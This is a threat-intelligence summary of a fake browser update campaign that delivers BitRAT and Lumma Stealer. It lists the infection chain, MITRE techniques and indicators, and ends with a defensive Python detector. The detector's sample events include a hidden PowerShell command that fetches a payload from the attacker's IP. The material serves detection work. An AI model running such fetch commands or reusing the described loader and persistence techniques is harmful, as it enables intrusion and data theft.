Fake Browser Updates delivering BitRAT and Lumma Stealer

eSentire’s TRU detected a fake browser update campaign delivering BitRAT and Lumma Stealer via compromised pages with injected JavaScript. The operation uses a multi-stage loader chain, AMSI bypass and a Discord CDN-hosted Update.zip to download loaders and payloads and reach C2 infrastructure. #BitRAT #LummaStealer

Keypoints

  • May 2024: TRU detected fake browser updates delivering BitRAT and Lumma Stealer.
  • Infection begins on an infected webpage with injected malicious JavaScript that redirects to a fake update page.
  • The ZIP archive Update.zip is downloaded from Discord’s CDN and contains Update.js, which acts as the initial downloader for subsequent payloads.
  • A chain of PowerShell scripts retrieves and executes the loader and payloads from 77.221.151.31, with AMSI bypass and persistence via Registry Run Key.
  • The loader (.NET PE, obfuscated) loads and injects payloads into RegSvcs.exe, with four unique files (s.png, z.png, a.png, 0x.png) serving loader and payload roles.
  • BitRAT provides extensive remote access capabilities (direct and Tor-based C2 connections, a UAC exploit, persistence, and more) and uses 77.221.151.31:4444 as part of its config; Tor is listed as a process name for the payload’s setup.
  • Lumma Stealer (LummaC2 Stealer) is a malware-as-a-service (MaaS) offering from the Russian-speaking threat actor “Shamel” (alias “Lumma”), with multiple C2 domains and data exfiltration via HTTP POST; the payload includes a non-resident loader for further delivery.

MITRE Techniques

  • [T1189] Drive-by Compromise – Infection chain began when the user visited an infected webpage containing injected malicious JavaScript code. “The infection chain began when the user visited an infected webpage containing injected malicious JavaScript code.”
  • [T1059.001] PowerShell – The ZIP archive contains several PowerShell scripts responsible for downloading and executing the next stage loader and payloads from http://77[.]221[.]151[.]31. “The ZIP archive contains several PowerShell scripts responsible for downloading and executing the next stage loader and payloads from http://77[.]221[.]151[.]31.”
  • [T1112] Modify Registry – Persistence is achieved by modifying the Registry Run Key so the payload runs at startup. “modifies the Registry Run Key.”
  • [T1055] Process Injection – Payloads are loaded and executed within the RegSvcs.exe process. “loading and executing the payload within RegSvcs.exe process.”
  • [T1027] Obfuscated/Compressed Files and Information – The loader is an obfuscated .NET PE that includes an AMSI bypass; it is deobfuscated and loaded into memory. “AMSI bypass, the code that leverages reflection in .NET to dynamically load and execute the payload within RegSvcs.exe process.”
  • [T1090.003] Multi-hop Proxy – BitRAT demonstrates both direct reverse connections and Tor-based connections for C2. “two modes of connections (direct reverse connection and Tor connection).”
  • [T1041] Exfiltration Over C2 Channel – The Lumma Stealer exfiltrates data to the C2 using HTTP POST requests. “The stolen data is sent to a C2 server via HTTP POST requests.”

Indicators of Compromise

  • [IP Address] BitRAT C2 – 77.221.151.31
  • [Domain] C2 domains – demonstationfukewko[.]shop, liabilitynighstjsko[.]shop, and 7 more
  • [File] Delivery artifacts – Update.zip, s.png, z.png, a.png, 0x.png
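A defender-side correlation sketch for the chain summarized above, added here as an example and not code from eSentire or the report: it tags constructed Sysmon-style events with the stage they match (Update.js script host, PowerShell stager pulling from 77.221.151.31, Run-key write, RegSvcs.exe spawned by PowerShell, BitRAT port 4444 contact, Lumma domain lookups) and alerts when two or more stages appear on one host. The event field names and the sample telemetry are assumptions; only indicators the summary lists are used.

```python
import re
# Indicators from the report; only the two .shop domains the summary names are listed.
C2_IP = "77.221.151.31"
BITRAT_PORT = 4444
LUMMA_DOMAINS = {"demonstationfukewko.shop", "liabilitynighstjsko.shop"}
ARTIFACTS = {"update.zip", "update.js", "s.png", "z.png", "a.png", "0x.png"}
RUN_KEY = re.compile(r"\\currentversion\\run\\", re.IGNORECASE)

def classify(ev):
    """Return the chain stages one event matches (empty list if none)."""
    hits = []
    kind = ev.get("type")
    image = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "").lower()
    if kind == "process":
        # Stage 1: a script host running Update.js extracted from Update.zip
        if image.endswith(("wscript.exe", "cscript.exe")) and "update.js" in cmd:
            hits.append("update_js_downloader")
        # Stage 2: PowerShell fetching the loader/payloads from the staging IP
        if image.endswith("powershell.exe") and C2_IP in cmd:
            hits.append("powershell_stager")
        # Stage 3: RegSvcs.exe (the injection host) spawned by PowerShell
        parent = ev.get("parent", "").lower()
        if image.endswith("regsvcs.exe") and parent.endswith("powershell.exe"):
            hits.append("regsvcs_injection_host")
    elif kind == "registry" and RUN_KEY.search(ev.get("key", "")):
        hits.append("run_key_persistence")
    elif kind == "network" and ev.get("dst_ip") == C2_IP:
        hits.append("bitrat_c2" if ev.get("dst_port") == BITRAT_PORT else "staging_ip_contact")
    elif kind == "dns" and ev.get("query", "").lower() in LUMMA_DOMAINS:
        hits.append("lumma_c2_dns")
    elif kind == "file" and ev.get("name", "").lower() in ARTIFACTS:
        hits.append("delivery_artifact")
    return hits

def correlate(events):
    """Aggregate stages seen on one host; two or more distinct stages raise an alert."""
    stages = sorted({h for ev in events for h in classify(ev)})
    return {"stages": stages, "alert": len(stages) >= 2}

SAMPLE_EVENTS = [  # constructed telemetry for one host, not captured from a real incident
    {"type": "file", "name": "Update.zip"},
    {"type": "process", "image": "wscript.exe", "cmdline": r'wscript "C:\Users\u\Downloads\Update\Update.js"'},
    {"type": "process", "image": "powershell.exe", "cmdline": "powershell -w hidden iwr http://77.221.151.31/s.png"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update"},
    {"type": "process", "image": "RegSvcs.exe", "parent": "powershell.exe"},
    {"type": "network", "dst_ip": "77.221.151.31", "dst_port": 4444},
    {"type": "dns", "query": "demonstationfukewko.shop"},
]
```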

Read more: https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer